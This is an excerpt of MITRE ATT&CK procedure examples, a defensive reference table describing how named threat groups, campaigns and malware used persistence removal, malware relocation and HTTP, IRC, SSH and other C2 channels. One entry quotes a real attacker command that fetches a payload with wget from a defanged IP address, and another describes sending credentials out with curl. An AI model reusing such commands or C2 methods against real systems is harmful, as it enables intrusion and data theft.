Real-world descriptions of how a group, tool or campaign used a technique.
17136 examples
| Technique | Used by | Procedure example |
|---|---|---|
| T1070.009 Clear Persistence |
ToolMCMD | MCMD has the ability to remove set Registry Keys, including those used for persistence. |
| T1070.010 Relocate Malware |
MalwareBRICKSTORM | BRICKSTORM has copied itself to the `usr/sbin/` folder. |
| T1071 Application Layer Protocol |
CampaignFrostyGoop Incident | During FrostyGoop Incident, the adversary initiated Layer Two Tunnelling Protocol (L2TP) connections to Moscow-based IP addresses. |
| T1071 Application Layer Protocol |
GroupTeamTNT | TeamTNT has used an IRC bot for C2 communications. |
| T1071 Application Layer Protocol |
GroupRocke | Rocke issued wget requests from infected systems to the C2. |
| T1071 Application Layer Protocol |
GroupINC Ransom | INC Ransom has used valid accounts over RDP to connect to targeted systems. |
| T1071 Application Layer Protocol |
GroupVelvet Ant | Velvet Ant has used reverse SSH tunnels to communicate to victim devices. |
| T1071 Application Layer Protocol |
GroupMagic Hound | Magic Hound malware has used IRC for C2. |
| T1071 Application Layer Protocol |
MalwareHildegard | Hildegard has used an IRC channel for C2 communications. |
| T1071 Application Layer Protocol |
MalwareQUIETEXIT | QUIETEXIT can use an inverse negotiated SSH connection as part of its C2. |
| T1071 Application Layer Protocol |
MalwareRaspberry Robin | Raspberry Robin is capable of contacting the TOR network for delivering second-stage payloads. |
| T1071 Application Layer Protocol |
MalwareSiloscape | Siloscape connects to an IRC server for C2. |
| T1071 Application Layer Protocol |
MalwareNightdoor | Nightdoor uses TCP and UDP communication for command and control traffic. |
| T1071 Application Layer Protocol |
MalwareNETEAGLE | Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519. |
| T1071 Application Layer Protocol |
MalwareLucifer | Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server. |
| T1071 Application Layer Protocol |
MalwareClambling | Clambling has the ability to use Telnet for communication. |
| T1071 Application Layer Protocol |
ToolSliver | Sliver can utilize the Wireguard VPN protocol for command and control. |
| T1071 Application Layer Protocol |
MalwareDuqu | Duqu uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols. |
| T1071.001 Web Protocols |
CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers. |
| T1071.001 Web Protocols |
CampaignSharePoint ToolShell Exploitation | During SharePoint ToolShell Exploitation, threat actors issued HTTP `POST` requests to web shells with spoofed or empty Referrer headers, to circumvent authorization controls. |
| T1071.001 Web Protocols |
CampaignFrankenstein | During Frankenstein, the threat actors used HTTP GET requests for C2. |
| T1071.001 Web Protocols |
CampaignRedDelta Modified PlugX Infection Chain Operations | Mustang Panda used HTTP POST messages for command and control from PlugX installations during RedDelta Modified PlugX Infection Chain Operations. |
| T1071.001 Web Protocols |
CampaignOperation MidnightEclipse | During Operation MidnightEclipse, threat actors used `wget` via HTTP to retrieve payloads. |
| T1071.001 Web Protocols |
Campaign2015 Ukraine Electric Power Attack | During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. |
| T1071.001 Web Protocols |
CampaignIndian Critical Infrastructure Intrusions | During Indian Critical Infrastructure Intrusions, RedEcho network activity included SSL traffic over TCP 443 and HTTP traffic over non-standard ports. |
| T1071.001 Web Protocols |
Campaign3CX Supply Chain Attack | During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request. |
| T1071.001 Web Protocols |
CampaignC0018 | During C0018, the threat actors used HTTP for C2 communications. |
| T1071.001 Web Protocols |
CampaignC0021 | During C0021, the threat actors used HTTP for some of their C2 communications. |
| T1071.001 Web Protocols |
CampaignJuicy Mix | During Juicy Mix, OilRig used a VBS script to send POST requests to register installed malware with C2. |
| T1071.001 Web Protocols |
CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 used HTTP for C2 and data exfiltration. |
| T1071.001 Web Protocols |
CampaignOperation CuckooBees | During Operation CuckooBees, the threat actors enabled HTTP and HTTPS listeners. |
| T1071.001 Web Protocols |
CampaignOuter Space | During Outer Space, OilRig used HTTP to communicate between installed backdoors and compromised servers including via the Microsoft Exchange Web Services API. |
| T1071.001 Web Protocols |
CampaignArcaneDoor | ArcaneDoor command and control activity was conducted through HTTP. |
| T1071.001 Web Protocols |
CampaignAPT41 DUST | APT41 DUST used HTTPS for command and control. |
| T1071.001 Web Protocols |
CampaignNight Dragon | During Night Dragon, threat actors used HTTP for C2. |
| T1071.001 Web Protocols |
CampaignVersa Director Zero Day Exploitation | Versa Director Zero Day Exploitation established HTTPS communications from adversary-controlled SOHO devices over port 443 with compromised Versa Director servers. |
| T1071.001 Web Protocols |
CampaignOperation Wocao | During Operation Wocao, threat actors’ XServer tool communicated using HTTP and HTTPS. |
| T1071.001 Web Protocols |
CampaignC0017 | During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads. |
| T1071.001 Web Protocols |
CampaignQuad7 Activity | Quad7 Activity has used the same User Agents of |
| T1071.001 Web Protocols |
GroupAPT38 | APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS. |
| T1071.001 Web Protocols |
GroupBlackByte | BlackByte collected victim device information then transmitted this via HTTP POST to command and control infrastructure. |
| T1071.001 Web Protocols |
GroupKimsuky | Kimsuky has used HTTP GET and POST requests for C2. |
| T1071.001 Web Protocols |
GroupAPT41 | APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits. |
| T1071.001 Web Protocols |
GroupAPT32 | APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP. |
| T1071.001 Web Protocols |
GroupHAFNIUM | HAFNIUM has used open-source C2 frameworks, including Covenant. |
| T1071.001 Web Protocols |
GroupMuddyWater | MuddyWater has used HTTP for C2 communications. |
| T1071.001 Web Protocols |
GroupRedEcho | RedEcho network activity is associated with SSL traffic via TCP 443 and proxied HTTP traffic over non-standard ports. |
| T1071.001 Web Protocols |
GroupGamaredon Group | Gamaredon Group has used HTTP and HTTPS for C2 communications. |
| T1071.001 Web Protocols |
GroupTeamTNT | TeamTNT has the `curl` command to send credentials over HTTP and the `curl` and `wget` commands to download new software. TeamTNT has also used a custom user agent HTTP header in shell scripts. |
| T1071.001 Web Protocols |
GroupSandworm Team | Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.